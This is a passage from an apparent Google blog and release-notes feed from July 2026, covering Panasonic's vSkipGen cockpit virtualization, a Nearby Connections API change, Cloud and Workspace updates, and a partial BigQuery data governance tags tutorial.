&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The platform virtualizes all essential peripherals, such as the audio, GPU, sensors, cameras, Controller Area Network (CAN), Bluetooth, and Wi-Fi, using the &lt;/span&gt;&lt;a href="https://docs.kernel.org/driver-api/virtio/virtio.html" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;VirtIO&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; standard. This VirtIO-native approach allows developers to interact with the virtual devices exactly as they would with the physical hardware. Furthermore, vSkipGen seamlessly connects with automotive simulators and software-in-the-loop (SiL) environments for comprehensive scenario and edge-case validation, enabling teams to conduct software validation and run automated test suites without needing early access to physical prototypes.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="2" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_kUn1gPH.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 2: vSkipGen Cockpit virtualization architecture&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="3" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/3_fb7zIDL.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 3: Remote GPU rendering flow&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Accelerating graphics on the go with Unified HMI&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;High-performance graphics is central to the modern driving experience, but rendering it in a virtual environment can be challenging. Panasonic’s Unified HMI solves this by decoupling HMI rendering from specific hardware. A lightweight Unified HMI component operates outside the VM to offload OpenGL ES commands (the specific data being rendered) from the Cuttlefish instance to GPU-equipped compute resources on Google Cloud, which handle the workloads with hardware acceleration. The rendered UI is then streamed to any standard browser using low-latency &lt;/span&gt;&lt;a href="https://webrtc.org/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;WebRTC&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. This helps ensure that global development teams can experience high-fidelity visuals in real time, regardless of their location.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Unified HMI establishes a unified virtual display layer across multiple&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Electronic Control Units (ECUs) and virtual machines, allowing applications to render to different displays from anywhere within the system.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Benefits for software-defined vehicle development&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With C4A-metal and &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Panasonic Automotive’s vSkipGen&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, manufacturers building software-defined vehicles can: &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Build and validate AAOS-based software in the cloud using Cuttlefish before physical hardware is available&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Use industry-standard VirtIO to emulate critical CDC devices for robust, production-grade validation&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Stream interactive cockpit experiences to any browser to support distributed engineering teams&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Run multiple isolated CDC instances in parallel to support large-scale automated testing and CI/CD pipelines&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Reduce cost and environmental impact by minimizing the need for expensive physical hardware prototypes, supporting sustainable development practices&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Enjoy a future-ready architecture built on open standards, crosvm, and Rust for enhanced security, performance, and long-term adaptability&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;C4A-metal is generally available worldwide; please refer to the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/compute/docs/instances/bare-metal-instances#c4a-metal"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;public documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for additional information. Panasonic Automotive’s vSkipGen with Unified HMI for Google Cloud will soon be available for evaluation access. To explore how these solutions can help you speed up cockpit software development, contact the team at &lt;/span&gt;&lt;a href="mailto:vSkipGenSupport@panasonicautomotive.com"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;vSkipGenSupport@panasonicautomotive.com&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;sub&gt;&lt;strong style="vertical-align: baseline;"&gt;Disclaimer&lt;br /&gt;&lt;/strong&gt;&lt;em&gt;&lt;span style="vertical-align: baseline;"&gt;All trademarks, tradenames, and service marks used herein are the property of their respective owners.&lt;/span&gt;&lt;/em&gt;&lt;/sub&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/partners/panasonic-automotive-vskipgen-runs-on-axion-based-c4a-metal" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-20T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://android-developers.googleblog.com/2026/07/upcoming-changes-nearby-connections-api.html</id>
    <title>Upcoming Changes to the Nearby Connections API</title>
    <updated>2026-07-20T13:00:00+00:00</updated>
    <content type="html">&lt;i&gt;Posted by Wei Wang, Engineering Manager, Android BeTo&lt;/i&gt;

&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG84rk4vo20t7pFUGFUp6Cx38qbJTZWW5Q5ztSfPOaV474gZ4mnT7qpnC6o4hKJkwR6CiD4TwPWCS0aU-w0nr70WkKrcpR2yRM5PXnMDa9t3mjgQVahNBzLijD2v23LiDj_NaMWoyVXWTV3cKXHsForureZTA1_Q5M_03ZAve7PybnhpYpGG05IS2uCv0/s8583/Upcoming%20Changes%20to%20the%20Nearby%20Connections%20API%20_Blog.png" style="clear: left; float: left; margin-bottom: 0.3em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG84rk4vo20t7pFUGFUp6Cx38qbJTZWW5Q5ztSfPOaV474gZ4mnT7qpnC6o4hKJkwR6CiD4TwPWCS0aU-w0nr70WkKrcpR2yRM5PXnMDa9t3mjgQVahNBzLijD2v23LiDj_NaMWoyVXWTV3cKXHsForureZTA1_Q5M_03ZAve7PybnhpYpGG05IS2uCv0/s1600/Upcoming%20Changes%20to%20the%20Nearby%20Connections%20API%20_Blog.png" /&gt;&lt;/a&gt;&lt;/div&gt;

&lt;p style="margin-bottom: 0.3em; margin-top: 0.3em;"&gt;User privacy and transparency are core to the Android experience. To better align with these principles, we are updating the default behavior of the Nearby Connections API regarding how it interacts with device radios.&lt;/p&gt;

&lt;h2 style="margin-bottom: 0.5em; margin-top: 1.5em;"&gt;What is changing?&lt;/h2&gt;
&lt;p style="margin-bottom: 0.3em; margin-top: 0.1em;"&gt;Previously, the Nearby Connections API could automatically toggle Wi-Fi and Bluetooth radios ON to facilitate connections without explicit user intervention. Moving forward, the API will no longer automatically enable these radios for 1P and 3P applications.&lt;/p&gt;

&lt;h2 style="margin-bottom: 0.5em; margin-top: 1.5em;"&gt;What this means for developers&lt;/h2&gt;
&lt;p style="margin-bottom: 0.3em; margin-top: 0.1em;"&gt;If your app relies on Nearby Connections, you will need to update your implementation to account for these changes:&lt;/p&gt;
&lt;ul style="margin-bottom: 0.3em; margin-top: 0.1em;"&gt;
  &lt;li style="margin-bottom: 0.2em;"&gt;&lt;strong&gt;Manual Radio Management:&lt;/strong&gt; You must ensure that the necessary radios (Wi-Fi or Bluetooth) are enabled before initiating Nearby Connections tasks.&lt;/li&gt;
  &lt;li style="margin-bottom: 0.2em;"&gt;&lt;strong&gt;User Notification:&lt;/strong&gt; If the required radios are disabled, your app must now inform the user and request that they enable them manually. The API will no longer programmatically turn them on for you.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 style="margin-bottom: 0.5em; margin-top: 1.5em;"&gt;Timing&lt;/h2&gt;
&lt;p style="margin-bottom: 0em; margin-top: 0.1em;"&gt;These changes are scheduled to take effect in late 2026. We recommend reviewing your connection workflows now to ensure a seamless transition for your users.&lt;/p&gt;</content>
    <link href="https://android-developers.googleblog.com/2026/07/upcoming-changes-nearby-connections-api.html" rel="alternate"/>
    <category term="Android Developers"/>
    <published>2026-07-20T13:00:00+00:00</published>
    <media:group>
      <media:content url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG84rk4vo20t7pFUGFUp6Cx38qbJTZWW5Q5ztSfPOaV474gZ4mnT7qpnC6o4hKJkwR6CiD4TwPWCS0aU-w0nr70WkKrcpR2yRM5PXnMDa9t3mjgQVahNBzLijD2v23LiDj_NaMWoyVXWTV3cKXHsForureZTA1_Q5M_03ZAve7PybnhpYpGG05IS2uCv0/s72-c/Upcoming%20Changes%20to%20the%20Nearby%20Connections%20API%20_Blog.png" type="image/png" medium="image"/>
      <media:thumbnail url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG84rk4vo20t7pFUGFUp6Cx38qbJTZWW5Q5ztSfPOaV474gZ4mnT7qpnC6o4hKJkwR6CiD4TwPWCS0aU-w0nr70WkKrcpR2yRM5PXnMDa9t3mjgQVahNBzLijD2v23LiDj_NaMWoyVXWTV3cKXHsForureZTA1_Q5M_03ZAve7PybnhpYpGG05IS2uCv0/s72-c/Upcoming%20Changes%20to%20the%20Nearby%20Connections%20API%20_Blog.png"/>
    </media:group>
    <link rel="enclosure" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG84rk4vo20t7pFUGFUp6Cx38qbJTZWW5Q5ztSfPOaV474gZ4mnT7qpnC6o4hKJkwR6CiD4TwPWCS0aU-w0nr70WkKrcpR2yRM5PXnMDa9t3mjgQVahNBzLijD2v23LiDj_NaMWoyVXWTV3cKXHsForureZTA1_Q5M_03ZAve7PybnhpYpGG05IS2uCv0/s72-c/Upcoming%20Changes%20to%20the%20Nearby%20Connections%20API%20_Blog.png" type="image/png" length="0"/>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#July_20_2026</id>
    <title>Cloud Release Notes — July 20, 2026</title>
    <updated>2026-07-20T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Batch&lt;/h2&gt;
&lt;h3&gt;Breaking&lt;/h3&gt;
&lt;p&gt;Starting on the following dates, you can no longer create a job that locates
its Compute Engine resources outside of the job's location.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;For projects that have successfully submitted before July 31, 2026 at least
one job that uses the &lt;code&gt;allowedLocations[]&lt;/code&gt; field with any region or zones
outside of the job's location, changes are starting on &lt;em&gt;June 30, 2027&lt;/em&gt;.&lt;/li&gt;
&lt;li&gt;For all other projects, changes are starting on &lt;em&gt;July 31, 2026&lt;/em&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If none of your jobs specify the &lt;code&gt;allowedLocations[]&lt;/code&gt; field, then no action is
required. Otherwise, ensure that any region or zones specified in the
&lt;code&gt;allowedLocations[]&lt;/code&gt; field are in the same region as the job's location
before these dates. For more information, see
&lt;a href="https://docs.cloud.google.com/batch/docs/locations"&gt;Batch locations&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud Load Balancing&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;For regional external passthrough Network Load Balancers, you can reserve specific or automatically
allocated bring your own IP (BYOIP) IPv6 addresses before creating a load
balancer, so that the IPv6 address persists independently of the load balancer's lifecycle. You can also promote an ephemeral BYOIP IPv6 address that is in use
by a load balancer to a reserved static IP address.&lt;/p&gt;
&lt;p&gt;For more information, see the following documentation:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/load-balancing/docs/network/setting-up-network-backend-service#byoip-ipv6"&gt;Set up a regional external passthrough Network Load Balancer with a backend service&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/load-balancing/docs/network/setting-up-networklb-multiple-protocols#byoip-ipv6"&gt;Set up a regional external passthrough Network Load Balancer for multiple IP protocols&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/load-balancing/docs/network/setting-up-network-zonal-neg#byoip-ipv6"&gt;Set up a regional external passthrough Network Load Balancer with zonal NEGs&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This feature is in &lt;strong&gt;Preview&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Virtual Private Cloud&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Preview&lt;/strong&gt;: You can reserve static external IPv6 addresses from
bring your own IP addresses (BYOIP) sub-prefixes that are in
&lt;code&gt;EXTERNAL_IPV6_FORWARDING_RULE_CREATION&lt;/code&gt; mode.&lt;/p&gt;
&lt;p&gt;You can assign these addresses to forwarding rules for external passthrough
Network Load Balancers and external protocol forwarding. You can also promote
ephemeral IPv6 BYOIP addresses that are used by external forwarding rules
to reserved static IP addresses.&lt;/p&gt;
&lt;p&gt;For more information, see
&lt;a href="https://docs.cloud.google.com/vpc/docs/create-ipv6-sub-prefixes#create-subprefix-use"&gt;Create external forwarding rules&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#July_20_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-07-20T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#July_19_2026</id>
    <title>Cloud Release Notes — July 19, 2026</title>
    <updated>2026-07-19T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Google SecOps SOAR&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;Release 6.3.94 is being rolled out to the first phase of regions as listed 
&lt;a href="https://docs.cloud.google.com/chronicle/docs/soar/overview-and-introduction/soar-gradual-release"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This release contains internal and customer bug fixes.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#July_19_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-07-19T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#July_18_2026</id>
    <title>Cloud Release Notes — July 18, 2026</title>
    <updated>2026-07-18T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Google SecOps SOAR&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/chronicle/docs/soar/release-notes#July_12_2026"&gt;Release 6.3.93&lt;/a&gt; is now
available for all regions.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#July_18_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-07-18T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/07/weekly-recap-07-17-2026.html</id>
    <title>Google Workspace Weekly Recap - July 17, 2026</title>
    <updated>2026-07-17T19:38:37+00:00</updated>
    <content type="html">&lt;h3 style="text-align: left;"&gt;Google Credential Provider for Windows (GCPW) now supports FIDO2-compliant physical security keys as a second factor for authentication&lt;/h3&gt;&lt;p&gt;Google Credential Provider for Windows (GCPW) has been updated to support FIDO2-compliant physical security keys as a second factor for authentication. This update helps organizations improve their security posture by enabling administrators to enforce 2-Step Verification (2SV) using hardware security keys at the Windows login screen.&amp;nbsp;| &lt;a href="https://workspaceupdates.googleblog.com/2026/07/google-credential-provider-for-windows-now-supports-FIDO2-compliant-physical-security-keys-as-a-second-factor-for-authentication.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Improvement to in-room problem reporting for Google Meet hardware&lt;/h3&gt;&lt;p&gt;Maintaining an enterprise-grade video conferencing environment requires visibility into the health of its devices. We're introducing new ways to see Google Meet hardware user-reported feedback directly in the Admin console. | &lt;a href="https://workspaceupdates.googleblog.com/2026/07/improvement-to-in-room-problem-reporting-for-Google-Meet-hardware.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;New refinement capabilities allow custom editing with Help me write in Gmail&lt;/h3&gt;&lt;p&gt;Users can now edit and revise their email drafts in Gmail via the prompt bar, using custom refine instructions in Help me write. Previously the refines were limited to preset options like Polish, Formalize, and Shorten. | &lt;a href="https://workspaceupdates.googleblog.com/2026/07/new-refinement-capabilities-allow-custom-editing-with-Help-me-write-in-Gmail.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Now available: group conversations with external collaborators in Google Chat&lt;/h3&gt;&lt;p&gt;For many teams, it’s essential to be able to work in real-time with partners from outside your organization. We’re improving external collaboration in Google Chat by making it possible to create group conversations that include external users. | &lt;a href="https://workspaceupdates.googleblog.com/2026/07/now-available-group-conversations-with-external-collaborators-in-Google-Chat.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;NotebookLM is now Gemini Notebook&lt;/h3&gt;&lt;p&gt;We’re renaming NotebookLM to Gemini Notebook. While it remains a standalone product focused on being your premier research tool, the new name reflects how it will evolve to do more across the Google ecosystem. | &lt;a href="https://workspaceupdates.googleblog.com/2026/07/notebooklm-now-gemini-notebook.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Easily control the emotions and pacing of AI avatars and AI voiceovers in Google Vids&lt;/h3&gt;&lt;p&gt;Users can now easily steer voiceover and avatar speaking in Google Vids by typing content within brackets like “[excitedly]”.&amp;nbsp;| &lt;a href="https://workspaceupdates.googleblog.com/2026/06/easily-steer-ai-voiceover-and-avatar-speaking-with-emotions-pacing-and-sound-effects.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Expanded language support for Gemini in Google Docs&lt;/h3&gt;&lt;p&gt;We are now expanding support for these features to 11 more languages, including Mandarin, Dutch, Malay, Hebrew, Polish, Turkish, Czech, Indonesian, Swedish, Danish, and Norwegian. These new additions join our previously supported languages: English, Spanish, Portuguese, Japanese, French, Korean, German, and Italian. | &lt;a href="https://workspaceupdates.googleblog.com/2026/07/expanded-language-support-for-gemini-in-Google-Docs.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Generate higher quality AI video clips and edit any video with Gemini Omni in Vids&lt;/h3&gt;&lt;p&gt;Users now have access to Gemini Omni directly within Google Vids. Omni provides higher quality video generation with significant improvements over previous models. Additionally, Omni’s world understanding unlocks simple video edits so you can ask Omni to tweak the video you have to get the video you need. | &lt;a href="https://workspaceupdates.googleblog.com/2026/07/generate-higher-quality-ai-video-clips-and-edit-any-video-with-Gemini-Omni-in-Vids.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Cast yourself in AI video clips using your personal avatar with Gemini Omni in Vids&lt;/h3&gt;&lt;p&gt;Users now have access to Gemini Omni directly within Google Vids. With Gemini Omni, you can create videos using your personal avatar to scale your presence without the studio time. Use a secure verification process to capture your likeness and then select it as a character in Omni generations within Vids. | &lt;a href="https://workspaceupdates.googleblog.com/2026/07/cast-yourself-in-ai-video-clips-using-your-personal-avatar-with-Gemini-Omni-in-Vids.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;New Google Meet 'Take notes for me' settings for admins and end users&lt;/h3&gt;&lt;p&gt;To help users remember to capture notes for meetings when it’s most valuable, we’re updating the admin and end user settings that let them pre-configure AI note-taking for Google Meet. | &lt;a href="https://workspaceupdates.googleblog.com/2026/07/new-google-meet-take-notes-for-me-settings-for-admins-and-end-users.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;&lt;span style="font-size: x-small;"&gt;The announcements above were published on the Workspace Updates blog over the last week. Please refer to the original blog posts for complete details.&lt;/span&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/07/weekly-recap-07-17-2026.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-07-17T19:38:37+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/data-analytics/level-up-your-column-level-security-using-iam-data-governance-tags-in-bigquery</id>
    <title>Level Up Your Column-level Security: Using IAM Data Governance Tags in BigQuery</title>
    <updated>2026-07-17T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Many BigQuery customers rely on policy tags for protecting their sensitive information in BigQuery. Policy tags were the go-to solution for applying column-level access controls, allowing only users with the right permission to view sensitive columns like personally identifiable information (PII). It was a robust and effective system — for its time.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;However, data ecosystems have grown in complexity, and the tools we use to help secure them need to evolve with them. New challenges include creating and managing a taxonomy that supports multiple tags across multiple regions and locations, enabling disaster recovery, and integrating with a broad centralized governance strategy.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To help you meet the needs of today’s data ecosystems, we're excited to introduce the &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;preview of&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;data governance tags&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; in BigQuery&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Built on Google Cloud's Identity and Access Manager’s (IAM) Resource Manager infrastructure, data governance tags provide a scalable, and robust method to help you manage access controls and protect your BigQuery column data.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;What are IAM data governance tags?&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Data governance tags are a special type of &lt;/span&gt;&lt;a href="https://cloud.google.com/resource-manager/docs/tags/tags-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Resource Manager tags&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.  You can create it by setting the purpose field to DATA_GOVERNANCE when creating a tag key in IAM, you designate it for use in BigQuery column-level security. You can create a hierarchical tree of data governance tags specifically for column-data governance purposes and apply them directly to your BigQuery columns. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Why use data governance tags for column-level security?&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Global scope, regional enforcement&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;:&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Unlike policy tags (which are regional-only), data governance tags are global. You can define a single tag key:value pair (like “data_sensitivity:high”) at the organization level and use it across any project or region in your organization.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Managed disaster recovery&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Security policies should persist during a failover. Data governance tags and their associated data policies are automatically replicated to secondary regions. If you need to switch regions, your security posture moves with you automatically.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Hierarchical security&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;:&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;You can now build a tree of tags up to five levels deep. This allows for inheritance and more granular classification (such as PII &amp;gt; Financial &amp;gt; CreditCardNumber).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Decoupled governance&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;:&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;You can tag your data to organize and classify it before you decide to enforce security. Access control only kicks in once you define a data policy for that tag, giving your team more flexibility during data onboarding&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Three steps to column-level security&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Step 1: Create the tag key and values&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;1. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Create data governance tag key&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;:&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;First you create an IAM tag key in Console&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;, &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;gcloud CLI, or API. The magic happens when you specify the purpose field as &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;--purpose=&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;DATA_GOVERNANCE&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; for the tag key. This key change tells Google Cloud that this tag will be used for column-level security in BigQuery.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;# Example: Creating a Data Governance tag key named &amp;quot;data_class&amp;quot;\r\ngcloud resource-manager tags keys create data_class \\\r\n  --parent=projects/my-governance-project \\\r\n  --purpose=DATA_GOVERNANCE&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f6ab36ab880&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;2. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Create tag values&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once your data governance tag key has been created, you need to create specific tag values under the key that you will use to categorize/classify your column data.  One of the useful features of data governance tags is the ability to build a hierarchical tree of tag values. The tag-values tree allows you to create broad categories and then drill down into specific categories based on data type. You can go up to five levels deep for granular access control.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
